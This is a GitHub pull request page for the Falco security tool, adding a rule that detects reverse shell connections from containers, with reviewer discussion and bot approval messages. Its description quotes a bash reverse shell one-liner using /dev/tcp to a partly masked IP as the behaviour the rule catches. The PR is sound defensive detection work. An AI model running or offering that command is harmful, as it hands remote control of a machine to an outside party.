-
Notifications
You must be signed in to change notification settings - Fork 912
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
rule update: add a rule to detect reverse shell #1152
Conversation
Signed-off-by: kaizhe <[email protected]>
rules/falco_rules.yaml
Outdated
@@ -2795,7 +2795,12 @@ | |||
priority: WARNING | |||
tags: [network] | |||
|
|||
|
|||
- rule: Reverse shell |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Can you make the rule name more specific to the actual behavior, something like "redirecting stdout to network connection in container"? There could be all kinds of reverse shells that don't use this technique.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Done. Thanks!
Signed-off-by: kaizhe <[email protected]>
LGTM label has been added. Git tree hash: 080e7989d2774ea938d72f736b8895a691bcca04
|
[APPROVALNOTIFIER] This PR is APPROVED This pull-request has been approved by: fntlnz, mstemm The full list of commands accepted by this bot can be found here. The pull request process is described here
Needs approval from an approver in each of these files:
Approvers can indicate their approval by writing |
Great work, thanks @Kaizhe |
@Kaizhe I updated the description to let it work correctly in the changelog. |
Thanks a lot @fntlnz ! |
Signed-off-by: kaizhe [email protected]
What type of PR is this?
/kind rule-create
Any specific area of the project related to this PR?
/area rules
What this PR does / why we need it:
Detect reverse shell connection from a container.
Which issue(s) this PR fixes:
Fixes #
Special notes for your reviewer:
/bin/bash -i >& /dev/tcp/34.204.xxx.xxx/1234 0>&1
-- reverse shell executionDoes this PR introduce a user-facing change?: